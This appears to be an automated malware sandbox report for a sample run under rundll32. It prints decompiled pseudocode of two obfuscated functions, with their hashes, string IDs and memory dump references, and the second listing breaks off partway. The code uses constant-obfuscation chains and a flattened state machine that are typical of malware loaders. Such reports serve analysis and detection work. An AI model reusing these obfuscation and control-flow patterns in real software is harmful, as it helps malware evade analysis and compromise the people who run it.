                                                                                                                          • String ID: &:,$&:,$&:,$&:,$/i=$GA$Kz\Q$W[o3$_}+$gkv$v$(a$ve$~ $#$1P
                                                                                                                          • API String ID: 0-1587349264
                                                                                                                          • Opcode ID: 893661f3a9a7e3edf685c7507a9265d06a7bb952a5da555097dea0079afc64c6
                                                                                                                          • Instruction ID: 3a5fafc2f7a6976f1f4bb3fab91cf8e307144b5de7d2cde6df041c396ef3bad2
                                                                                                                          • Opcode Fuzzy Hash: 893661f3a9a7e3edf685c7507a9265d06a7bb952a5da555097dea0079afc64c6
                                                                                                                          • Instruction Fuzzy Hash: 77520071109380DFD7B8CF61C48AA8BBBE1BBC5304F108A1DE6DA96261D7B58949CF53
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 007A5CC4 Relevance: 16.7, Strings: 13, Instructions: 434COMMONCrypto
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 88%
                                                                                                                          			E007A5CC4() {
				char _v520;
				char _v1040;
				char _v1560;
				void* _v1572;
				intOrPtr _v1576;
				signed int _v1580;
				signed int _v1584;
				signed int _v1588;
				signed int _v1592;
				signed int _v1596;
				signed int _v1600;
				signed int _v1604;
				signed int _v1608;
				signed int _v1612;
				signed int _v1616;
				signed int _v1620;
				signed int _v1624;
				signed int _v1628;
				signed int _v1632;
				signed int _v1636;
				signed int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				signed int _v1680;
				signed int _v1684;
				signed int _v1688;
				signed int _v1692;
				signed int _v1696;
				signed int _v1700;
				signed int _v1704;
				signed int _v1708;
				signed int _v1712;
				signed int _v1716;
				signed int _v1720;
				signed int _v1724;
				signed int _v1728;
				signed int _v1732;
				signed int _v1736;
				signed int _v1740;
				signed int _v1744;
				signed int _v1748;
				signed int _v1752;
				signed int _v1756;
				signed int _v1760;
				signed int _v1764;
				void* _t481;
				signed int _t496;
				void* _t499;
				intOrPtr _t503;
				void* _t539;
				signed int _t550;
				signed int _t551;
				signed int _t552;
				intOrPtr _t553;
				intOrPtr* _t554;
				signed int _t555;
				signed int _t556;
				signed int _t557;
				signed int _t558;
				signed int _t559;
				signed int _t560;
				signed int _t561;
				signed int _t562;
				signed int _t563;
				signed int _t564;
				signed int _t567;
				signed int* _t568;
				void* _t572;

				_t568 =  &_v1764;
				_v1576 = 0x9a4c1d;
				_v1596 = _v1596 & 0x00000000;
				asm("stosd");
				_t499 = 0x9b91574;
				asm("stosd");
				asm("stosd");
				_v1684 = 0xe59dc4;
				_v1684 = _v1684 | 0xd0a48cbc;
				_v1684 = _v1684 + 0xffff2e59;
				_v1684 = _v1684 ^ 0xd0e4cc7c;
				_v1752 = 0x51b4b3;
				_v1752 = _v1752 ^ 0x5d9a17a0;
				_t550 = 0xb;
				_t555 = 0x76;
				_v1752 = _v1752 * 0xb;
				_v1752 = _v1752 ^ 0x54bb96eb;
				_v1752 = _v1752 ^ 0x53749705;
				_v1632 = 0xaf6c30;
				_v1632 = _v1632 << 6;
				_v1632 = _v1632 ^ 0x2bdb0c02;
				_v1720 = 0x499d0c;
				_v1720 = _v1720 | 0xb1a117f5;
				_v1720 = _v1720 / _t550;
				_v1720 = _v1720 + 0x97c7;
				_v1720 = _v1720 ^ 0x102d1aad;
				_v1704 = 0xc8e3b3;
				_v1704 = _v1704 * 0x32;
				_v1704 = _v1704 ^ 0x0819b8db;
				_v1704 = _v1704 | 0x44ca091a;
				_v1704 = _v1704 ^ 0x6fefc93f;
				_v1668 = 0xa62014;
				_v1668 = _v1668 | 0xeabb5dd4;
				_v1668 = _v1668 * 0x68;
				_v1668 = _v1668 ^ 0x5dcb1e30;
				_v1744 = 0xf6f234;
				_v1744 = _v1744 * 0x2a;
				_v1744 = _v1744 ^ 0x80b741fb;
				_v1744 = _v1744 / _t555;
				_v1744 = _v1744 ^ 0x0165dd5f;
				_v1584 = 0x312e96;
				_v1584 = _v1584 + 0xffff2d5f;
				_v1584 = _v1584 ^ 0x003c0d9d;
				_v1712 = 0xa058cf;
				_v1712 = _v1712 << 0xd;
				_v1712 = _v1712 >> 8;
				_t556 = 0x70;
				_v1712 = _v1712 / _t556;
				_v1712 = _v1712 ^ 0x000e60b1;
				_v1624 = 0xe892f9;
				_v1624 = _v1624 | 0x8c579b60;
				_v1624 = _v1624 ^ 0x8cfff2b4;
				_v1616 = 0xaf548d;
				_v1616 = _v1616 << 0xe;
				_v1616 = _v1616 ^ 0xd52eab36;
				_v1732 = 0xb05ea2;
				_v1732 = _v1732 * 0x22;
				_t557 = 0x7e;
				_v1732 = _v1732 / _t557;
				_t558 = 0x6e;
				_v1732 = _v1732 / _t558;
				_v1732 = _v1732 ^ 0x000d3439;
				_v1592 = 0x913a71;
				_v1592 = _v1592 + 0xffff7440;
				_v1592 = _v1592 ^ 0x0095b07c;
				_v1696 = 0x599322;
				_v1696 = _v1696 / _t550;
				_v1696 = _v1696 ^ 0xb13d8f34;
				_v1696 = _v1696 ^ 0xb1384542;
				_v1644 = 0xa16dfa;
				_v1644 = _v1644 ^ 0xe1099bcb;
				_v1644 = _v1644 ^ 0xe1a9d34e;
				_v1648 = 0xb4e11f;
				_v1648 = _v1648 ^ 0x38d2ca48;
				_v1648 = _v1648 ^ 0x386e0f93;
				_v1608 = 0x5a22b;
				_t559 = 0x77;
				_t551 = 0x6a;
				_v1608 = _v1608 * 0x7a;
				_v1608 = _v1608 ^ 0x02a61538;
				_v1680 = 0xefbd86;
				_v1680 = _v1680 ^ 0x59656a46;
				_v1680 = _v1680 + 0xffff500f;
				_v1680 = _v1680 ^ 0x598ded80;
				_v1724 = 0x3ee43e;
				_v1724 = _v1724 + 0x7543;
				_v1724 = _v1724 ^ 0x2e29824a;
				_v1724 = _v1724 + 0xffff57f4;
				_v1724 = _v1724 ^ 0x2e1fc8aa;
				_v1580 = 0xa6d208;
				_v1580 = _v1580 | 0x568c9bfe;
				_v1580 = _v1580 ^ 0x56ae214d;
				_v1636 = 0x6d5924;
				_v1636 = _v1636 ^ 0x925c239d;
				_v1636 = _v1636 ^ 0x923215a4;
				_v1664 = 0x695adc;
				_v1664 = _v1664 / _t559;
				_v1664 = _v1664 + 0x9e91;
				_v1664 = _v1664 ^ 0x000b7b12;
				_v1728 = 0x27fcd;
				_v1728 = _v1728 << 7;
				_v1728 = _v1728 >> 0xd;
				_v1728 = _v1728 / _t551;
				_v1728 = _v1728 ^ 0x000e8750;
				_v1660 = 0x324e38;
				_t560 = 0xd;
				_v1660 = _v1660 / _t560;
				_v1660 = _v1660 ^ 0xc6795c1b;
				_v1660 = _v1660 ^ 0xc67cbc2f;
				_v1672 = 0xd5264d;
				_v1672 = _v1672 ^ 0x5df7965f;
				_v1672 = _v1672 << 0xa;
				_v1672 = _v1672 ^ 0x8ac02156;
				_v1760 = 0x48e2ee;
				_t213 =  &_v1760; // 0x48e2ee
				_t561 = 0x2d;
				_v1760 =  *_t213 / _t561;
				_v1760 = _v1760 ^ 0xd2c1db30;
				_v1760 = _v1760 ^ 0xa53e2936;
				_v1760 = _v1760 ^ 0x77fe21cd;
				_v1740 = 0xf20c88;
				_v1740 = _v1740 / _t551;
				_v1740 = _v1740 | 0xd96c60ad;
				_v1740 = _v1740 << 0xc;
				_v1740 = _v1740 ^ 0xe68a7191;
				_v1588 = 0x8e0aab;
				_t562 = 0x1b;
				_v1588 = _v1588 * 0x60;
				_v1588 = _v1588 ^ 0x354c6054;
				_v1748 = 0x4e8d34;
				_v1748 = _v1748 + 0x9e68;
				_v1748 = _v1748 ^ 0xb589d4ed;
				_v1748 = _v1748 ^ 0xb12a6144;
				_v1748 = _v1748 ^ 0x04e7453a;
				_v1756 = 0x3003da;
				_v1756 = _v1756 << 2;
				_v1756 = _v1756 + 0x3550;
				_v1756 = _v1756 + 0xffff4840;
				_v1756 = _v1756 ^ 0x00bf12fa;
				_v1764 = 0x8da8e8;
				_v1764 = _v1764 * 0x70;
				_v1764 = _v1764 | 0x3d3a45ac;
				_v1764 = _v1764 + 0xffff8f06;
				_v1764 = _v1764 ^ 0x3dfaa955;
				_v1600 = 0x16815c;
				_v1600 = _v1600 | 0x74adb72e;
				_v1600 = _v1600 ^ 0x74bac2ad;
				_v1736 = 0x173f97;
				_v1736 = _v1736 + 0x884f;
				_v1736 = _v1736 ^ 0x83e17d26;
				_v1736 = _v1736 ^ 0x7950511a;
				_v1736 = _v1736 ^ 0xfaacae3a;
				_v1640 = 0x9a0364;
				_v1640 = _v1640 >> 4;
				_v1640 = _v1640 ^ 0x000747da;
				_v1700 = 0xbe1482;
				_v1700 = _v1700 ^ 0x7ff54444;
				_v1700 = _v1700 << 4;
				_v1700 = _v1700 + 0xffff3bda;
				_v1700 = _v1700 ^ 0xf4b38ed0;
				_v1708 = 0xf0c015;
				_v1708 = _v1708 >> 2;
				_v1708 = _v1708 * 0x59;
				_v1708 = _v1708 >> 0xd;
				_v1708 = _v1708 ^ 0x00007652;
				_v1628 = 0xfcf2a2;
				_v1628 = _v1628 + 0x310b;
				_v1628 = _v1628 ^ 0x00fb84b7;
				_v1716 = 0xcaf3e1;
				_v1716 = _v1716 ^ 0x58005d51;
				_v1716 = _v1716 / _t562;
				_v1716 = _v1716 << 0xb;
				_v1716 = _v1716 ^ 0x4f02f929;
				_v1688 = 0xa9bf16;
				_t563 = 0x35;
				_v1688 = _v1688 / _t563;
				_v1688 = _v1688 * 0x4f;
				_v1688 = _v1688 ^ 0x00ffa3e1;
				_v1692 = 0x1a52e4;
				_v1692 = _v1692 | 0xd338ade8;
				_v1692 = _v1692 + 0xffff9820;
				_v1692 = _v1692 ^ 0xd337a700;
				_v1652 = 0xe154f6;
				_v1652 = _v1652 ^ 0xa48feb80;
				_v1652 = _v1652 ^ 0xa466ad28;
				_v1676 = 0x84491a;
				_v1676 = _v1676 + 0x31b5;
				_v1676 = _v1676 + 0x8487;
				_v1676 = _v1676 ^ 0x0081059f;
				_v1604 = 0xb120c5;
				_t564 = 0x4b;
				_t552 = _v1596;
				_t567 = _v1596;
				_v1604 = _v1604 * 0x65;
				_v1604 = _v1604 ^ 0x45e4f2f6;
				_v1656 = 0x2a0a41;
				_v1656 = _v1656 << 0xc;
				_t498 = _v1596;
				_v1656 = _v1656 / _t564;
				_v1656 = _v1656 ^ 0x022e7e7e;
				_v1612 = 0x774513;
				_v1612 = _v1612 | 0x207416f8;
				_v1612 = _v1612 ^ 0x207b64ec;
				_v1620 = 0x205158;
				_v1620 = _v1620 << 0xd;
				_v1620 = _v1620 ^ 0x0a275bbe;
				while(1) {
					L1:
					while(1) {
						_t539 = 0x5c;
						do {
							while(1) {
								L3:
								_t572 = _t499 - 0xa8fcf9f;
								if(_t572 > 0) {
									break;
								}
								if(_t572 == 0) {
									E007A8F9E(_v1688, _v1692, _v1652, _v1676, _t567);
									_t568 =  &(_t568[3]);
									goto L19;
								} else {
									if(_t499 == 0x4b40ba0) {
										_t553 =  *0x7b3e10; // 0x0
										_t554 = _t553 + 0x1c;
										while(1) {
											__eflags =  *_t554 - _t539;
											if( *_t554 == _t539) {
												break;
											}
											_t554 = _t554 + 2;
											__eflags = _t554;
										}
										_t552 = _t554 + 2;
										_t499 = 0x9c63280;
										continue;
									} else {
										if(_t499 == 0x7e93d80) {
											_t567 = E00791CEC(_v1740, _t552, _t499, _t499, _t552, _v1588, _t498, _v1748, _v1756, _v1764, _v1632, _v1704, _t499, _v1600, _v1668, _v1736, _t499, _v1720, _t499, _v1640,  &_v520);
											_t568 =  &(_t568[0x13]);
											__eflags = _t567;
											if(_t567 == 0) {
												L19:
												_t499 = 0xfa48365;
												_t539 = 0x5c;
												continue;
											} else {
												_t499 = 0xacc4ac0;
												_v1596 = 1;
												while(1) {
													_t539 = 0x5c;
													goto L3;
												}
											}
										} else {
											if(_t499 == 0x9b91574) {
												_push(_v1624);
												_push(_v1684);
												_push(_v1712);
												_push( &_v1560);
												E007A46BB(_v1744, _v1584);
												_t568 = _t568 - 0xc + 0x1c;
												_t499 = 0xf66352a;
												while(1) {
													_t539 = 0x5c;
													goto L3;
												}
											} else {
												if(_t499 != 0x9c63280) {
													goto L27;
												} else {
													_t496 = E0079912C(_v1752, _v1728, _t499, _v1660, _t499, _v1672, _v1760);
													_t498 = _t496;
													_t568 =  &(_t568[5]);
													if(_t496 != 0) {
														_t499 = 0x7e93d80;
														while(1) {
															_t539 = 0x5c;
															goto L3;
														}
													}
												}
											}
										}
									}
								}
								L24:
								return _v1596;
							}
							__eflags = _t499 - 0xacc4ac0;
							if(_t499 == 0xacc4ac0) {
								E0079D6D8(_t567, _v1708, _t498, _v1628, _v1716);
								_t568 =  &(_t568[4]);
								_t499 = 0xa8fcf9f;
								_t539 = 0x5c;
								goto L27;
							} else {
								__eflags = _t499 - 0xf66352a;
								if(__eflags == 0) {
									_push(_v1592);
									_push(_v1732);
									_t481 = E007ADCF7(_v1616, 0x791020, __eflags);
									E007A176B( &_v1040, __eflags);
									_t503 =  *0x7b3e10; // 0x0
									_t431 = _t503 + 0x1c; // 0x1c
									_t432 = _t503 + 0x23c; // 0x23c
									E007A1652(_v1644, __eflags, _t432, _t431, _v1648, _v1608, _t481, 0x104,  &_v520, _v1680,  &_v1560, _v1724,  &_v1040, _v1580);
									E0079A8B0(_v1636, _t481, _v1664);
									_t568 =  &(_t568[0xf]);
									_t499 = 0x4b40ba0;
									goto L1;
								} else {
									__eflags = _t499 - 0xfa48365;
									if(_t499 != 0xfa48365) {
										goto L27;
									} else {
										E007A8F9E(_v1604, _v1656, _v1612, _v1620, _t498);
									}
								}
							}
							goto L24;
							L27:
							__eflags = _t499 - 0xd334e0e;
						} while (_t499 != 0xd334e0e);
						goto L24;
					}
				}
			}














































































                                                                                                                          0x007a5cc4
                                                                                                                          0x007a5cca
                                                                                                                          0x007a5ce2
                                                                                                                          0x007a5cea
                                                                                                                          0x007a5cef
                                                                                                                          0x007a5cf4
                                                                                                                          0x007a5cf5
                                                                                                                          0x007a5cf6
                                                                                                                          0x007a5cfe
                                                                                                                          0x007a5d06
                                                                                                                          0x007a5d0e
                                                                                                                          0x007a5d16
                                                                                                                          0x007a5d1e
                                                                                                                          0x007a5d2b
                                                                                                                          0x007a5d2e
                                                                                                                          0x007a5d31
                                                                                                                          0x007a5d35
                                                                                                                          0x007a5d3d
                                                                                                                          0x007a5d45
                                                                                                                          0x007a5d50
                                                                                                                          0x007a5d58
                                                                                                                          0x007a5d63
                                                                                                                          0x007a5d6b
                                                                                                                          0x007a5d7b
                                                                                                                          0x007a5d7f
                                                                                                                          0x007a5d87
                                                                                                                          0x007a5d8f
                                                                                                                          0x007a5d9c
                                                                                                                          0x007a5da0
                                                                                                                          0x007a5da8
                                                                                                                          0x007a5db0
                                                                                                                          0x007a5db8
                                                                                                                          0x007a5dc0
                                                                                                                          0x007a5dcd
                                                                                                                          0x007a5dd1
                                                                                                                          0x007a5dd9
                                                                                                                          0x007a5de6
                                                                                                                          0x007a5dea
                                                                                                                          0x007a5dfa
                                                                                                                          0x007a5dfe
                                                                                                                          0x007a5e06
                                                                                                                          0x007a5e11
                                                                                                                          0x007a5e1c
                                                                                                                          0x007a5e27
                                                                                                                          0x007a5e2f
                                                                                                                          0x007a5e34
                                                                                                                          0x007a5e3d
                                                                                                                          0x007a5e40
                                                                                                                          0x007a5e44
                                                                                                                          0x007a5e4c
                                                                                                                          0x007a5e57
                                                                                                                          0x007a5e62
                                                                                                                          0x007a5e6d
                                                                                                                          0x007a5e78
                                                                                                                          0x007a5e80
                                                                                                                          0x007a5e8b
                                                                                                                          0x007a5e9a
                                                                                                                          0x007a5ea4
                                                                                                                          0x007a5ea9
                                                                                                                          0x007a5eb3
                                                                                                                          0x007a5eb8
                                                                                                                          0x007a5ebc
                                                                                                                          0x007a5ec4
                                                                                                                          0x007a5ecf
                                                                                                                          0x007a5eda
                                                                                                                          0x007a5ee5
                                                                                                                          0x007a5ef5
                                                                                                                          0x007a5efb
                                                                                                                          0x007a5f03
                                                                                                                          0x007a5f0b
                                                                                                                          0x007a5f16
                                                                                                                          0x007a5f21
                                                                                                                          0x007a5f2c
                                                                                                                          0x007a5f37
                                                                                                                          0x007a5f42
                                                                                                                          0x007a5f4d
                                                                                                                          0x007a5f60
                                                                                                                          0x007a5f63
                                                                                                                          0x007a5f66
                                                                                                                          0x007a5f6d
                                                                                                                          0x007a5f78
                                                                                                                          0x007a5f80
                                                                                                                          0x007a5f88
                                                                                                                          0x007a5f90
                                                                                                                          0x007a5f98
                                                                                                                          0x007a5fa0
                                                                                                                          0x007a5fa8
                                                                                                                          0x007a5fb0
                                                                                                                          0x007a5fb8
                                                                                                                          0x007a5fc0
                                                                                                                          0x007a5fcb
                                                                                                                          0x007a5fd6
                                                                                                                          0x007a5fe1
                                                                                                                          0x007a5fec
                                                                                                                          0x007a5ff7
                                                                                                                          0x007a6002
                                                                                                                          0x007a6012
                                                                                                                          0x007a6016
                                                                                                                          0x007a601e
                                                                                                                          0x007a6026
                                                                                                                          0x007a602e
                                                                                                                          0x007a6033
                                                                                                                          0x007a6040
                                                                                                                          0x007a6044
                                                                                                                          0x007a604c
                                                                                                                          0x007a6058
                                                                                                                          0x007a605b
                                                                                                                          0x007a605f
                                                                                                                          0x007a6067
                                                                                                                          0x007a606f
                                                                                                                          0x007a6077
                                                                                                                          0x007a607f
                                                                                                                          0x007a6084
                                                                                                                          0x007a608e
                                                                                                                          0x007a6096
                                                                                                                          0x007a609c
                                                                                                                          0x007a60a1
                                                                                                                          0x007a60a5
                                                                                                                          0x007a60ad
                                                                                                                          0x007a60b5
                                                                                                                          0x007a60bd
                                                                                                                          0x007a60cd
                                                                                                                          0x007a60d3
                                                                                                                          0x007a60db
                                                                                                                          0x007a60e0
                                                                                                                          0x007a60e8
                                                                                                                          0x007a60fb
                                                                                                                          0x007a60fe
                                                                                                                          0x007a6105
                                                                                                                          0x007a6110
                                                                                                                          0x007a6118
                                                                                                                          0x007a6120
                                                                                                                          0x007a6128
                                                                                                                          0x007a6130
                                                                                                                          0x007a6138
                                                                                                                          0x007a6140
                                                                                                                          0x007a6145
                                                                                                                          0x007a614d
                                                                                                                          0x007a6155
                                                                                                                          0x007a615d
                                                                                                                          0x007a616a
                                                                                                                          0x007a616e
                                                                                                                          0x007a6176
                                                                                                                          0x007a617e
                                                                                                                          0x007a6186
                                                                                                                          0x007a6191
                                                                                                                          0x007a619c
                                                                                                                          0x007a61a7
                                                                                                                          0x007a61af
                                                                                                                          0x007a61b7
                                                                                                                          0x007a61bf
                                                                                                                          0x007a61c7
                                                                                                                          0x007a61cf
                                                                                                                          0x007a61da
                                                                                                                          0x007a61e2
                                                                                                                          0x007a61ed
                                                                                                                          0x007a61f5
                                                                                                                          0x007a61fd
                                                                                                                          0x007a6202
                                                                                                                          0x007a620a
                                                                                                                          0x007a6212
                                                                                                                          0x007a621a
                                                                                                                          0x007a6224
                                                                                                                          0x007a6228
                                                                                                                          0x007a622d
                                                                                                                          0x007a6235
                                                                                                                          0x007a6240
                                                                                                                          0x007a624b
                                                                                                                          0x007a6256
                                                                                                                          0x007a625e
                                                                                                                          0x007a626e
                                                                                                                          0x007a6272
                                                                                                                          0x007a6277
                                                                                                                          0x007a627f
                                                                                                                          0x007a628b
                                                                                                                          0x007a628e
                                                                                                                          0x007a6297
                                                                                                                          0x007a629b
                                                                                                                          0x007a62a3
                                                                                                                          0x007a62ab
                                                                                                                          0x007a62b5
                                                                                                                          0x007a62bd
                                                                                                                          0x007a62c5
                                                                                                                          0x007a62d0
                                                                                                                          0x007a62db
                                                                                                                          0x007a62e6
                                                                                                                          0x007a62ee
                                                                                                                          0x007a62f6
                                                                                                                          0x007a62fe
                                                                                                                          0x007a6306
                                                                                                                          0x007a631b
                                                                                                                          0x007a631c
                                                                                                                          0x007a6323
                                                                                                                          0x007a632a
                                                                                                                          0x007a6331
                                                                                                                          0x007a633c
                                                                                                                          0x007a6344
                                                                                                                          0x007a634f
                                                                                                                          0x007a6356
                                                                                                                          0x007a635a
                                                                                                                          0x007a6362
                                                                                                                          0x007a636d
                                                                                                                          0x007a6378
                                                                                                                          0x007a6383
                                                                                                                          0x007a638e
                                                                                                                          0x007a6396
                                                                                                                          0x007a63a1
                                                                                                                          0x007a63a1
                                                                                                                          0x007a63a6
                                                                                                                          0x007a63a8
                                                                                                                          0x007a63a9
                                                                                                                          0x007a63a9
                                                                                                                          0x007a63a9
                                                                                                                          0x007a63a9
                                                                                                                          0x007a63ab
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x007a63b1
                                                                                                                          0x007a64ef
                                                                                                                          0x007a64f4
                                                                                                                          0x00000000
                                                                                                                          0x007a63b7
                                                                                                                          0x007a63bd
                                                                                                                          0x007a64bb
                                                                                                                          0x007a64c1
                                                                                                                          0x007a64c9
                                                                                                                          0x007a64c9
                                                                                                                          0x007a64cc
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x007a64c6
                                                                                                                          0x007a64c6
                                                                                                                          0x007a64c6
                                                                                                                          0x007a64ce
                                                                                                                          0x007a64d1
                                                                                                                          0x00000000
                                                                                                                          0x007a63c3
                                                                                                                          0x007a63c9
                                                                                                                          0x007a649d
                                                                                                                          0x007a649f
                                                                                                                          0x007a64a2
                                                                                                                          0x007a64a4
                                                                                                                          0x007a64f7
                                                                                                                          0x007a64f7
                                                                                                                          0x007a63a8
                                                                                                                          0x00000000
                                                                                                                          0x007a64a6
                                                                                                                          0x007a64a6
                                                                                                                          0x007a64ab
                                                                                                                          0x007a63a6
                                                                                                                          0x007a63a8
                                                                                                                          0x00000000
                                                                                                                          0x007a63a8
                                                                                                                          0x007a63a6
                                                                                                                          0x007a63cb
                                                                                                                          0x007a63d1
                                                                                                                          0x007a6411
                                                                                                                          0x007a641f
                                                                                                                          0x007a6423
                                                                                                                          0x007a6435
                                                                                                                          0x007a6436
                                                                                                                          0x007a643b
                                                                                                                          0x007a643e
                                                                                                                          0x007a63a6
                                                                                                                          0x007a63a8
                                                                                                                          0x00000000
                                                                                                                          0x007a63a8
                                                                                                                          0x007a63d3
                                                                                                                          0x007a63d9
                                                                                                                          0x00000000
                                                                                                                          0x007a63df
                                                                                                                          0x007a63f8
                                                                                                                          0x007a63fd
                                                                                                                          0x007a63ff
                                                                                                                          0x007a6404
                                                                                                                          0x007a640a
                                                                                                                          0x007a63a6
                                                                                                                          0x007a63a8
                                                                                                                          0x00000000
                                                                                                                          0x007a63a8
                                                                                                                          0x007a63a6
                                                                                                                          0x007a6404
                                                                                                                          0x007a63d9
                                                                                                                          0x007a63d1
                                                                                                                          0x007a63c9
                                                                                                                          0x007a63bd
                                                                                                                          0x007a6546
                                                                                                                          0x007a6557
                                                                                                                          0x007a6557
                                                                                                                          0x007a6501
                                                                                                                          0x007a6507
                                                                                                                          0x007a6619
                                                                                                                          0x007a661e
                                                                                                                          0x007a6621
                                                                                                                          0x007a6625
                                                                                                                          0x00000000
                                                                                                                          0x007a650d
                                                                                                                          0x007a650d
                                                                                                                          0x007a6513
                                                                                                                          0x007a6558
                                                                                                                          0x007a6564
                                                                                                                          0x007a656f
                                                                                                                          0x007a657d
                                                                                                                          0x007a65bd
                                                                                                                          0x007a65ca
                                                                                                                          0x007a65ce
                                                                                                                          0x007a65dc
                                                                                                                          0x007a65f1
                                                                                                                          0x007a65f6
                                                                                                                          0x007a65f9
                                                                                                                          0x00000000
                                                                                                                          0x007a6515
                                                                                                                          0x007a6515
                                                                                                                          0x007a651b
                                                                                                                          0x00000000
                                                                                                                          0x007a6521
                                                                                                                          0x007a653e
                                                                                                                          0x007a6543
                                                                                                                          0x007a651b
                                                                                                                          0x007a6513
                                                                                                                          0x00000000
                                                                                                                          0x007a6626
                                                                                                                          0x007a6626
                                                                                                                          0x007a6626
                                                                                                                          0x00000000
                                                                                                                          0x007a6632
                                                                                                                          0x007a63a6

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: $Ym$94$>>$A*$Cu$FjeY$P5$Q]$Rv$T`L5$XQ $d{ $H
                                                                                                                          • API String ID: 0-2231434368
                                                                                                                          • Opcode ID: 2a387ed053208bc1098972dc7a7293500e5b879891e796a2a7164fd670502dc9
                                                                                                                          • Instruction ID: c6bdd4e504a5f6d353bddb18f95a57602242db53a837d79e83adaaa3ad7cab38
                                                                                                                          • Opcode Fuzzy Hash: 2a387ed053208bc1098972dc7a7293500e5b879891e796a2a7164fd670502dc9
                                                                                                                          • Instruction Fuzzy Hash: 65224371508380DFD768CF25C58AA9BFBE2FBC5744F108A1DE29A86260D7B58949CF43
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 007A6DF8 Relevance: 15.5, Strings: 12, Instructions: 510COMMONCrypto
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 95%
                                                                                                                          			E007A6DF8(void* __ecx) {
				char _v524;
				char _v1044;
				char _v1564;
				short _v1568;
				short _v1572;
				intOrPtr _v1576;
				intOrPtr _v1580;
				intOrPtr _v1592;
				char _v1596;
				char _v1600;
				signed int _v1604;
				signed int _v1608;
				signed int _v1612;
				signed int _v1616;
				signed int _v1620;
				signed int _v1624;
				signed int _v1628;
				signed int _v1632;
				signed int _v1636;
				signed int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				signed int _v1680;
				signed int _v1684;
				signed int _v1688;
				signed int _v1692;
				signed int _v1696;
				signed int _v1700;
				signed int _v1704;
				signed int _v1708;
				signed int _v1712;
				signed int _v1716;
				signed int _v1720;
				signed int _v1724;
				signed int _v1728;
				signed int _v1732;
				signed int _v1736;
				signed int _v1740;
				signed int _v1744;
				signed int _v1748;
				signed int _v1752;
				signed int _v1756;
				signed int _v1760;
				signed int _v1764;
				signed int _v1768;
				signed int _v1772;
				signed int _v1776;
				signed int _v1780;
				signed int _v1784;
				signed int _v1788;
				signed int _v1792;
				signed int _v1796;
				signed int _v1800;
				signed int _v1804;
				signed int _v1808;
				signed int _v1812;
				signed int _v1816;
				signed int _v1820;
				signed int _v1824;
				signed int _v1828;
				signed int _v1832;
				signed int _v1836;
				signed int _v1840;
				signed int _v1844;
				void* _t583;
				void* _t585;
				void* _t592;
				void* _t603;
				void* _t606;
				void* _t609;
				signed int _t611;
				signed int _t612;
				signed int _t613;
				signed int _t614;
				signed int _t615;
				signed int _t616;
				signed int _t617;
				signed int _t618;
				signed int _t619;
				void* _t620;
				signed int _t674;
				char _t675;
				void* _t677;
				signed int* _t682;

				_t682 =  &_v1844;
				_v1580 = 0x812dcc;
				_v1600 = 0;
				_v1572 = 0;
				_v1568 = 0;
				_v1576 = 0x4b1be1;
				_v1604 = 0xb0e9fc;
				_v1604 = _v1604 >> 0xe;
				_v1604 = _v1604 ^ 0x020002c3;
				_v1816 = 0x316963;
				_v1816 = _v1816 ^ 0x05c37e76;
				_v1816 = _v1816 * 0x44;
				_t609 = __ecx;
				_v1816 = _v1816 << 6;
				_t677 = 0xb42e112;
				_v1816 = _v1816 ^ 0x13878f70;
				_v1648 = 0xe65aa1;
				_v1648 = _v1648 + 0xffffb7c7;
				_v1648 = _v1648 ^ 0x00e866e0;
				_v1608 = 0x4e6d43;
				_v1608 = _v1608 << 3;
				_v1608 = _v1608 ^ 0x027e4d7c;
				_v1792 = 0x62c447;
				_v1792 = _v1792 + 0xfffff9b0;
				_v1792 = _v1792 + 0xffff1ab6;
				_v1792 = _v1792 ^ 0x5826ec20;
				_v1792 = _v1792 ^ 0x58465e47;
				_v1616 = 0xd881ce;
				_t611 = 0x1c;
				_v1616 = _v1616 / _t611;
				_v1616 = _v1616 ^ 0x00049a8c;
				_v1784 = 0x225701;
				_v1784 = _v1784 ^ 0x455f73cc;
				_v1784 = _v1784 + 0x2d0b;
				_v1784 = _v1784 + 0xffff7069;
				_v1784 = _v1784 ^ 0x457ed570;
				_v1656 = 0xa0746c;
				_v1656 = _v1656 << 5;
				_v1656 = _v1656 ^ 0x1405cb88;
				_v1756 = 0x86f3a;
				_v1756 = _v1756 << 0xf;
				_v1756 = _v1756 + 0xffff9aa0;
				_v1756 = _v1756 ^ 0x379e88f8;
				_v1840 = 0x372205;
				_v1840 = _v1840 << 0xb;
				_v1840 = _v1840 >> 1;
				_t612 = 0x47;
				_v1840 = _v1840 * 0x27;
				_v1840 = _v1840 ^ 0x18b0e4c5;
				_v1720 = 0x55473e;
				_v1720 = _v1720 >> 0xe;
				_v1720 = _v1720 + 0xffff4222;
				_v1720 = _v1720 ^ 0xfff7d1f7;
				_v1760 = 0x8a22d4;
				_v1760 = _v1760 ^ 0x5338d916;
				_v1760 = _v1760 / _t612;
				_v1760 = _v1760 ^ 0x01221ec9;
				_v1716 = 0x7ad7ec;
				_v1716 = _v1716 ^ 0xb2734e10;
				_v1716 = _v1716 ^ 0xf628ba0e;
				_v1716 = _v1716 ^ 0x44287105;
				_v1624 = 0x6426f4;
